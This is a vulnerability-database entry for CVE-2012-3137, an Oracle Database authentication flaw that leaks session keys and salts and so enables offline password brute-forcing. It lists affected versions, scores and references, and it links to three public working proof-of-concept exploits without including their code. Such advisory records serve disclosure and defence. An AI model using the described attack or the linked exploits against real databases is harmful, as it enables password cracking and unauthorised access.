CVE-2012-3137

Oracle Database Server - Info Disclosure

Title source: llm
STIX 2.1

Description

The authentication protocol in Oracle Database Server 10.2.0.3, 10.2.0.4, 10.2.0.5, 11.1.0.7, 11.2.0.2, and 11.2.0.3 allows remote attackers to obtain the session key and salt for arbitrary users, which leaks information about the cryptographic hash and makes it easier to conduct brute force password guessing attacks, aka "stealth password cracking vulnerability."

Exploits (3)

exploitdb WORKING POC
by Esteban Martinez Fayo · pythonlocalmultiple
https://www.exploit-db.com/exploits/22069
nomisec WORKING POC 4 stars
by r1- · poc
https://github.com/r1-/cve-2012-3137
nomisec WORKING POC 3 stars
by hantwister · poc
https://github.com/hantwister/o5logon-fetch

References (8)

Core 8
Core References
Exploit, Third Party Advisory, VDB Entry exploit x_refsource_exploit-db
http://www.exploit-db.com/exploits/22069
Third Party Advisory, VDB Entry vdb-entry x_refsource_bid
http://www.securityfocus.com/bid/55651
Broken Link vendor-advisory x_refsource_mandriva
http://www.mandriva.com/security/advisories?name=MDVSA-2013:150

Scores

EPSS 0.5492
EPSS Percentile 98.1%

Details

CWE
CWE-287
Status published
Products (9)
oracle/database_server 10.2.0.3
oracle/database_server 10.2.0.4
oracle/database_server 10.2.0.5
oracle/database_server 11.1.0.7
oracle/database_server 11.2.0.2
oracle/database_server 11.2.0.3
oracle/primavera_p6_enterprise_project_portfolio_management 8.2
oracle/primavera_p6_enterprise_project_portfolio_management 8.3
oracle/primavera_p6_enterprise_project_portfolio_management 8.4
Published Sep 21, 2012
Tracked Since Feb 18, 2026